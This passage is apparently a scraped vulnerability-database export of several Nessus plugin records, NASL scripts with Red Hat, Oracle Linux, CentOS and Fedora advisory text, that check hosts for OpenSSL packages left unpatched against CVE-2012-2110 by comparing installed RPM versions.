= get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5\\.3|5\\.6|6\\.1)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.3 / 5.6 / 6.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0522\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"openssl-0.9.7a-43.20.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"openssl-0.9.7a-43.20.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"openssl-0.9.7a-43.20.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"openssl-devel-0.9.7a-43.20.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"openssl-devel-0.9.7a-43.20.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"openssl-perl-0.9.7a-43.20.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"openssl-perl-0.9.7a-43.20.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"openssl-0.9.8e-12.el5_6.9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"openssl-debuginfo-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"openssl-debuginfo-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"openssl-devel-0.9.8e-12.el5_6.9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"openssl-perl-0.9.8e-12.el5_6.9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"openssl-perl-0.9.8e-12.el5_6.9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"openssl-perl-0.9.8e-12.el5_6.9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"openssl-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"openssl-debuginfo-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"openssl-devel-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"openssl-perl-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"openssl-perl-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"openssl-static-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"openssl-static-1.0.0-10.el6_1.6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"openssl-static-1.0.0-10.el6_1.6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:33:09", "description": "From Red Hat Security Advisory 2012:0518 :\n\nUpdated openssl, openssl097a, and openssl098e packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain a backported patch to resolve this issue. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 : openssl (ELSA-2012-0518)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssl", "p-cpe:/a:oracle:linux:openssl-devel", "p-cpe:/a:oracle:linux:openssl-perl", "p-cpe:/a:oracle:linux:openssl-static", "p-cpe:/a:oracle:linux:openssl097a", "p-cpe:/a:oracle:linux:openssl098e", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2012-0518.NASL", "href": "https://www.tenable.com/plugins/nessus/68519", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0518 and \n# Oracle Linux Security Advisory ELSA-2012-0518 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68519);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"RHSA\", value:\"2012:0518\");\n\n script_name(english:\"Oracle Linux 5 / 6 : openssl (ELSA-2012-0518)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0518 :\n\nUpdated openssl, openssl097a, and openssl098e packages that fix one\nsecurity issue are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One)\ndata from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted\nDER (Distinguished Encoding Rules) encoded data read from a file or\nother BIO input could cause an application using the OpenSSL library\nto crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to\ntake effect, all services linked to the OpenSSL library must be\nrestarted, or the system rebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002775.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002778.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl097a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl098e\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"openssl-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"openssl-devel-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"openssl-perl-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"openssl097a-0.9.7a-11.el5_8.2\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"openssl-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-devel-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-perl-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-static-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl098e-0.9.8e-17.0.1.el6_2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl / openssl-static / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T16:16:55", "description": "Updated openssl, openssl097a, and openssl098e packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain a backported patch to resolve this issue. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 : openssl (CESA-2012:0518)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:openssl", "p-cpe:/a:centos:centos:openssl-devel", "p-cpe:/a:centos:centos:openssl-perl", "p-cpe:/a:centos:centos:openssl-static", "p-cpe:/a:centos:centos:openssl097a", "p-cpe:/a:centos:centos:openssl098e", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2012-0518.NASL", "href": "https://www.tenable.com/plugins/nessus/58852", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0518 and \n# CentOS Errata and Security Advisory 2012:0518 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58852);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"RHSA\", value:\"2012:0518\");\n\n script_name(english:\"CentOS 5 / 6 : openssl (CESA-2012:0518)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl, openssl097a, and openssl098e packages that fix one\nsecurity issue are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One)\ndata from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted\nDER (Distinguished Encoding Rules) encoded data read from a file or\nother BIO input could cause an application using the OpenSSL library\nto crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to\ntake effect, all services linked to the OpenSSL library must be\nrestarted, or the system rebooted.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018592.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8b3b3c9\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018596.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fd980b42\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-2110\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl097a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl098e\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"openssl-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openssl-devel-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openssl-perl-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openssl097a-0.9.7a-11.el5_8.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-devel-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-perl-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-static-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl098e-0.9.8e-17.el6.centos.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl / openssl-static / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:41:01", "description": "Upstream security update fixing CVE-2012-2110 - memory corruption in when reading ASN.1 structures through BIO interface.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-05-11T00:00:00", "type": "nessus", "title": "Fedora 15 : openssl-1.0.0i-1.fc15 (2012-6395)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssl", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-6395.NASL", "href": "https://www.tenable.com/plugins/nessus/59071", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6395.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59071);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"FEDORA\", value:\"2012-6395\");\n\n script_name(english:\"Fedora 15 : openssl-1.0.0i-1.fc15 (2012-6395)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security update fixing CVE-2012-2110 - memory corruption in\nwhen reading ASN.1 structures through BIO interface.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=814185\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080176.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b8f98300\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"openssl-1.0.0i-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:38:59", "description": "According to its banner, the remote web server is running a version of OpenSSL 1.0.1 earlier than 1.0.1a. As such, the OpenSSL library itself is reportedly affected by a memory corruption vulnerability via an integer truncation error in the function 'asn1_d2i_read_bio' when reading ASN.1 DER format data. \n\nApplications using the 'BIO' or 'FILE' based functions (i.e., 'd2i_*_bio' or 'd2i_*_fp' functions) are affected by this issue. Also affected are 'S/MIME' or 'CMS' applications using 'SMIME_read_PKCS7' or 'SMIME_read_CMS' parsers. The OpenSSL command line utility is affected if used to handle untrusted DER formatted data. \n\nNote that the SSL/TLS code of OpenSSL is not affected. Also not affected are applications using memory-based ASN.1 functions (e.g., 'd2i_X509', 'd2i_PKCS12', etc.) nor are applications using only PEM functions.", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "nessus", "title": "OpenSSL 1.0.1 < 1.0.1a ASN.1 asn1_d2i_read_bio Memory Corruption", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2023-08-21T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_1_0_1A.NASL", "href": "https://www.tenable.com/plugins/nessus/58801", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58801);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/21\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"EDB-ID\", value:\"18756\");\n\n script_name(english:\"OpenSSL 1.0.1 < 1.0.1a ASN.1 asn1_d2i_read_bio Memory Corruption\");\n script_summary(english:\"Does a banner check.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host may be affected by a memory corruption vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the remote web server is running a version\nof OpenSSL 1.0.1 earlier than 1.0.1a. As such, the OpenSSL library\nitself is reportedly affected by a memory corruption vulnerability via\nan integer truncation error in the function 'asn1_d2i_read_bio' when\nreading ASN.1 DER format data. \n\nApplications using the 'BIO' or 'FILE' based functions (i.e.,\n'd2i_*_bio' or 'd2i_*_fp' functions) are affected by this issue. Also\naffected are 'S/MIME' or 'CMS' applications using 'SMIME_read_PKCS7'\nor 'SMIME_read_CMS' parsers. The OpenSSL command line utility is\naffected if used to handle untrusted DER formatted data. \n\nNote that the SSL/TLS code of OpenSSL is not affected. Also not\naffected are applications 